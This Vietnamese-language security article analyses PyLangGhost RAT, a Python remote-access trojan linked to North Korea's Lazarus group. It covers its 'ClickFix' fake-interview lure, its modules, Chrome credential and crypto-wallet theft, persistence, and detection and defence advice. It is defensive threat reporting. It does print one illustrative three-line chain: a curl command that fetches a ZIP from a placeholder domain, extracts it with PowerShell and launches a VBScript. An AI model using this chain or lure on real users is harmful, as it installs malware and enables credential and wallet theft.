Nhóm tác nhân đe dọa do nhà nước Triều Tiên bảo trợ, liên kết với Lazarus Group, cụ thể là phân nhóm mang tên Famous Chollima, đã nâng cấp chiến thuật tấn công của mình. Chúng triển khai một mối đe dọa mới mang tên PyLangGhost RAT, một trojan truy cập từ xa (RAT) dựa trên Python.

Mã độc này là một bản tái hiện của RAT GoLangGhost trước đó. Nó thể hiện cấu trúc mã nguồn có dấu hiệu của quá trình chuyển đổi được hỗ trợ bởi AI. Điều này bao gồm các mẫu logic giống Go và nhiều phần mã bị comment (chú thích) ngoại vi.

Tổng quan về PyLangGhost RAT và chiến thuật “ClickFix”

Không giống như việc phát tán mã độc truyền thống qua phần mềm lậu hoặc USB, PyLangGhost RAT lợi dụng các chiến dịch kỹ thuật xã hội “ClickFix” được nhắm mục tiêu cao. Các chiến dịch này chủ yếu hướng đến các nhà phát triển và giám đốc điều hành trong các lĩnh vực công nghệ, tài chính và tiền điện tử.

Trong các hoạt động này, đối tượng tấn công sẽ dàn dựng các cuộc phỏng vấn xin việc hoặc cuộc gọi kinh doanh giả mạo. Chúng mô phỏng các lỗi trình duyệt ngăn chặn quyền truy cập camera hoặc microphone.

Theo báo cáo của Any.Run, nạn nhân được yêu cầu thực thi một tập lệnh được cho là để sửa lỗi. Trên thực tế, tập lệnh này cấp cho những kẻ tấn công quyền kiểm soát hệ thống hoàn toàn từ xa. Kỹ thuật này gần đây đã được nhà nghiên cứu Heiner García Pérez của BlockOSINT ghi nhận. Ông đã đối mặt với nó trong một cuộc tuyển dụng mô phỏng cho Giao thức Aave DeFi.

Kỹ thuật Tấn công và Truyền tải của PyLangGhost RAT

Cuộc tấn công bắt đầu bằng một thông báo lỗi đánh lừa người dùng. Ví dụ điển hình là “Race Condition in Windows Camera Discovery Cache”. Thông báo này hướng dẫn người dùng chạy một lệnh để tải xuống và thực thi các payload độc hại.

Cơ chế truyền tải liên quan đến lệnh `curl` để tìm nạp một tệp ZIP từ một miền đáng ngờ. Sau đó, nó được giải nén qua `PowerShell’s Expand-Archive`. Một VBScript (`update.vbs`) được khởi chạy, giải nén môi trường Python sạch được đóng gói trong `Lib.zip`.

Môi trường này bao gồm một tệp `python.exe` được đổi tên thành `csshost.exe`. Tệp này thực thi bộ tải lõi `nvidia.py`.

Cơ chế tải và thực thi này được minh họa như sau:

curl -O hxxp://[suspicious_domain]/payload.zip
Expand-Archive -Path payload.zip -DestinationPath C:ProgramDataUpdateService
C:WindowsSystem32wscript.exe C:ProgramDataUpdateServiceupdate.vbs

Các module chính và chức năng

Kiến trúc mô-đun của mã độc bao gồm nhiều thành phần quan trọng:

• config.py: Định nghĩa các mã lệnh, máy chủ C2 và các tiện ích mở rộng Chrome mục tiêu như MetaMask và Phantom.
• api.py: Xây dựng các gói tin được mã hóa RC4 và sử dụng MD5 checksums qua HTTP không TLS.
• command.py: Gửi các lệnh, bao gồm trinh sát hệ thống, tải lên/tải xuống tệp, reverse shells và đánh cắp thông tin đăng nhập.
• util.py: Xử lý nén/giải nén trong bộ nhớ với `tar.gz`.
• auto.py: Tập trung vào việc thu thập dữ liệu ví tiền điện tử và thông tin đăng nhập được lưu trữ trong Chrome. Mô-đun này sử dụng kỹ thuật leo thang đặc quyền thông qua các lời nhắc UAC lừa đảo bắt chước “python.exe” để truy cập các khóa mã hóa được bảo vệ bằng DPAPI.

Cơ chế duy trì và giao tiếp C2

PyLangGhost RAT thiết lập khả năng duy trì thông qua các khóa registry và một tệp mutex `.store`. Điều này đảm bảo chỉ có một phiên bản được thực thi. Nó giao tiếp với cơ sở hạ tầng C2 bằng cách sử dụng địa chỉ IP thô với cơ chế che giấu yếu bằng RC4/MD5.

Mã độc hỗ trợ các lệnh để thu thập thông tin hệ thống, thao tác tệp, phiên terminal và các chế độ tự động đánh cắp dữ liệu. Các chế độ này nén và trích xuất hồ sơ trình duyệt vào các kho lưu trữ `gather.tar.gz`.

Đối với việc đánh cắp thông tin đăng nhập, nó giả mạo `lsass.exe` để giành quyền SYSTEM. Mã độc này giải mã các khối AES-GCM từ các cơ sở dữ liệu SQLite trong Local State và Login Data của Chrome. Nó xử lý cả khóa DPAPI v10 và các biến thể v20 liên kết với ứng dụng bằng cách sử dụng giải mã CNG API.

Nhận diện và Phòng chống PyLangGhost RAT

Phân tích hành vi của PyLangGhost RAT cho thấy các User-Agent mặc định của `python-requests` và các yêu cầu C2 nhanh chóng là các chỉ báo phát hiện. Tuy nhiên, điểm số VirusTotal ban đầu vẫn thấp (0-3 lượt phát hiện). Điều này trái ngược với việc gắn cờ độ tin cậy cao trong các môi trường sandbox.

Các kỹ thuật, chiến thuật và quy trình (TTPs) của RAT này phù hợp với khung MITRE ATT&CK. Bao gồm T1036 (masquerading – giả mạo), T1059 (scripting interpreters – trình thông dịch tập lệnh), T1083 (file discovery – khám phá tệp) và T1012 (registry queries – truy vấn registry). PyLangGhost RAT đặt ra những rủi ro nghiêm trọng như tổn thất tài chính từ việc bị chiếm đoạt ví, rò rỉ dữ liệu, gián đoạn hoạt động và các hình phạt pháp lý.

Các biện pháp phòng thủ và phát hiện xâm nhập

Các biện pháp phòng thủ nhấn mạnh việc sử dụng các sandbox dựa trên hành vi để phát hiện sớm. Ngoài ra, việc đào tạo nhân viên về các lệnh không xác minh được, hạn chế đặc quyền, giám sát lưu lượng truy cập bất thường và tăng cường bảo mật trình duyệt là vô cùng quan trọng. Để hiểu rõ hơn về phân tích sâu của mã độc này, có thể tham khảo báo cáo từ Any.Run.

Việc triển khai các hệ thống phát hiện xâm nhập (IDS/IPS) hiệu quả và thường xuyên cập nhật các bản vá bảo mật cũng là một phần không thể thiếu trong chiến lược bảo vệ. Sự cảnh giác của người dùng và các quy trình bảo mật chặt chẽ có thể giảm thiểu đáng kể nguy cơ từ các tấn công mạng tinh vi như PyLangGhost RAT.